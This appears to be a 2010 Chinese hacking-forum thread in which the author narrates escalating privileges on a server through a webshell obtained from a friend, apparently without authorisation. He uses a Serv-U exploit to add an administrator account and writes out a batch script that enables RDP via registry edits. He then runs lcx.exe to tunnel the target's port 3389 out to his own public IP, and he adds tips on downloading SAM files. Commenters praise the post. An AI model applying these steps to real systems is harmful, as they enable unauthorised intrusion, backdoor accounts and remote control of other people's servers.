Board logo

标题: [原创文章] 我的一次提权。。。 [打印本页]

作者: hyrz    时间: 2010-1-30 15:11     标题: 我的一次提权。。。

今天朋友丢了一个webshell给我,叫我帮他提权。拿到密码进去后,朋友说D盘可以浏览,进入D盘后看到很多敏感目录;如图1。6 a' ]2 ^3 _- v, s& W; Q
[attach]1777[/attach]- n& N( ~3 A: {/ t# H, ^7 r( h

; G) w0 J6 c' l; @, h7 Z   我个人有个习惯,每次拿到webshell我都要看看支不支持ASP.NET,我认为它一般权限大于asp,可能是管理的疏漏吧。如是传了个aspx的大马,用自带的端口扫描工具,扫了下端口,1433和43958都开了。哈哈!这下有希望了!为了不走往前老套的方法,想到找sa密码,哈哈!这样提权还没试过。用大马自带的工具,看了下iis下有多少个站,才2个,我想一定不是虚拟空间。打开网站根目录下的conn.asp文件后,让我差点没晕倒!!用的是access数据库,看来sa走不通。走不通怎么办?当然是继续走咯!想到服务器还安装了serv-u,于是在C:\Documents and Settings\All Users\「开始」菜单\程序\Serv-U\路径找到su的快捷方式;如图2[attach]1778[/attach](以后大家也可以参考我这种方法),用文本方式打开后找到了su的安装路径,心中一阵狂喜!原来su在D盘!哈哈,终于有希望了!找到su目录后当然是看ServUDaemon.ini文件是否能编辑,随便敲了几个字母回车后提示没权限。这种事情我早就预料到了!不过我还是有点怕,怕丢了大侠风范啊.哼。。看来要把它ServUDaemon.ini文件下载回来修改,由于电脑没装su,就全部下载回来了。打开一看还要注册,打开百度直接搜索破解版!~~~~(>_<)~~~~ 浪费了我宝贵的时间...安装好后给自己添加了一个管理员账户,目录设置在C盘。。。经过一番的修改,成了我一生最难忘的回忆。。。知道了吗?刚刚不是不可编辑吗?我修改它干什么??倒。。。心里真的快要达到绝望的境界!看了前辈不少的教程的我,当然班门弄斧下。想到刚刚我打开su的时候没有提示输入密码,说明是默认的SU账号。这时心里的欲火终于燃烧起来!在我电脑的垃圾箱里找到了Lake2和GoldSun的提权脚本,传了上去后,手一直在抖,心里想会不会成功??不成功一切都会结束?打开提权脚本,随意的设置了一下,点击添加,一会儿,提示添加成功。在cmdshell敲入"net user",回显的结果让我晕过去。看来上天注定我很失败!!!回显里没有我那神圣的账号。难道是提权脚本的问题吗?换了GoldSun的脚本再来一次。打开后点击添加,很快显示了添加成功!再次在cmdshell敲入"net user",有没! 看来一只鸡在我眼前都不能吃。。。收拾了战场,但心里还是过不去。现在都凌晨3:00了,而我一点睡意都没,可能都是这个webshell搞的。我不甘心啊。。。。在webshell我随便的逛了一下,点来点去,而就在这时我发现我的aspx大马里有一个su exp如图3,cmd这栏填入"net user XXX XXX /add",点击添加,马上就显示一大堆信息!把滚动条拉到最后,有条信息让我乐翻了天;如图4和5.为了验证是否添加成功就在cmdshell敲入"net user";如图6。( U5 ~/ O* ]( T+ G, v+ P8 I. r1 R
图3:
& g- m1 ]! N8 S6 t/ A" ?[attach]1779[/attach]
8 q5 ]- `$ E. i( a" d* b0 @8 P9 V  [- ~9 g3 O$ z" T' T
图4:
4 f2 h  `8 Y* }, |# h7 ~[attach]1780[/attach]
' U& p! s# }: q. [' u% H; \' C1 @8 c& [图5:
2 X5 I0 D/ u3 W7 n' m, D[attach]1781[/attach]
  t4 }$ P7 o( l. ]* C: h' P
; H2 ]! [' M& p, {- s图6:5 s" |5 a* Y+ q: [, m! ]
[attach]1782[/attach]
$ c, J% @& n  U2 p; g6 B, n
$ i2 o# t, f* M8 n. F9 ?
$ L9 ^/ L' [, [     看来添加成功了!打开端口扫描,发现3389端口没开,就传了个3389.exe,等了片刻后,在cmdshell里执行了3389.exe,在刷新下页面,发现没有打开,看来生效了!为了让我渺小的心灵得到冲刷,顺便在这小小短短的时间里到网上看下MM. 片刻后,我再次打开webshell,可以访问了。再次用自带的端口扫描工具扫描了下,发现没开;什么原因??晕死了。。。看来要问问Baidu了,过了一会我在网上找到了一个开3389 bat文件;代码如下:
  1. echo Windows Registry Editor Version 5.00>>3389.reg
  2. echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]>>3389.reg
  3. echo "fDenyTSConnections"=dword:00000000>>3389.reg
  4. echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]>>3389.reg
  5. echo "PortNumber"=dword:00000d3d>>3389.reg
  6. echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]>>3389.reg
  7. echo "PortNumber"=dword:00000d3d>>3389.reg
  8. regedit /s 3389.reg
  9. del 3389.reg
复制代码
传到服务器运行了下,3389端口这才开了!兴奋的ing!想不到一个简单脚本叫比的上3389.exe,而且不要重启,真够凹。。。在cmdshell里敲入"ipconfig"回车,发现是内网的,怎么办??就算是开了3389也不一定连接的上,而且webshell的ip也显示内网的IP(如图7),刚刚还没看到,一看晕死!以为内网IP跑天下呢。。。刚好上次看了一个教程,叫端口转发,教程很简单!我推荐大家看下。2 A. w( A4 |! p5 B
& H; q$ ?( Y+ k9 s2 z
图7:
" m4 j/ l, Z* k, l5 M$ ^3 x( W! d[attach]1783[/attach]4 S7 g9 v8 M6 Y( l# L

- ]# F/ I. i4 y    传了一个lcx.exe端口转发工具后,在cmdshell里执行"D:\DotComDemo\inc\lcx.exe -slave 本机公网ip 51 目标本地ip 3389 "(简单介绍:(将目标ip的3389端口转发到本机的51端口);如图8;% s2 S9 D/ s" X) b; @# w

9 F4 L- [" Z2 |% G( g7 U图8:4 c& t5 ~+ H) |: Z4 w
[attach]1784[/attach]
# H4 h$ H8 k$ i& B
  {  M# x7 M; I& ]% n, @; O5 |" o      然后在本机执行"lcx.exe -listen 51 880",(简单介绍:监听本机的51端口,将目标主机转发过来的3389端口开放在本机的880端口)
" D8 k* e: h% S( x0 u& {. @然后用mstsc连接本机880端口登陆(127.0.0.1:880) )记住如果lcx不做当前目录,就写绝对路径。倒!本机的lcx.exe没有回显,(如图:9)就再次在cmdshell里重复执行了一次,本地的lcx还是没回显!难道失败了?心里想,可能有时没回显吧。打开mstsc连接"127.0.0.1:880",哈哈!连接上了!如图10.敲入刚刚添加的账号,连接成功!如图11.哈哈。到此提权就结束了!
8 Z6 f: ?; h# R8 x5 q) L" Q; x图9:. @6 B- Y/ v9 d, m& r
[attach]1785[/attach]
' q5 s5 k* p0 q+ I% e. Z图10:
8 n5 @' t* K, c1 v) K: R9 W$ Z% \[attach]1786[/attach]# q' a- w2 ]! T/ F  L

0 }# g; ^& t' q图11:
) m, |, @& U. S% A5 |% \[attach]1787[/attach]
1 `! _* n, q  H7 ?       不过个人还是有点经验给大家分享!如果大家拿到webshell可以看看支不支持ASP.NET(aspx),如果支持可能会给你一个好的收获!还有一些黑友抱怨,sam文件下载不到或复制不到,个人之前用php大马就可以下载的了,你们可以试下!小弟的文笔有点差,能看的就将就看下。有什么问题加我Q:345432349.千万不要问我帮忙之类的,我们可以一起交流分享!
作者: 柔肠寸断    时间: 2010-1-30 20:12

aspx  su   lcx....
作者: hyrz    时间: 2010-1-30 20:23

断肠是不是你改了我标题?
作者: 柔肠寸断    时间: 2010-1-30 23:32

额,是的,要像篇文章啊。。。
作者: fl2012    时间: 2010-1-31 03:49

学习吧都是知识
作者: zollll    时间: 2010-2-12 09:46

楼主真厉害,3389
作者: lr163    时间: 2010-3-5 19:38

呵呵,学习了,谢谢楼主的分享!
作者: lr163    时间: 2010-3-5 19:38

呵呵,学习了,谢谢楼主的分享!
作者: 在意z    时间: 2012-5-16 00:16

谢谢楼主分享技术。。。




欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com./) Powered by Discuz! 7.2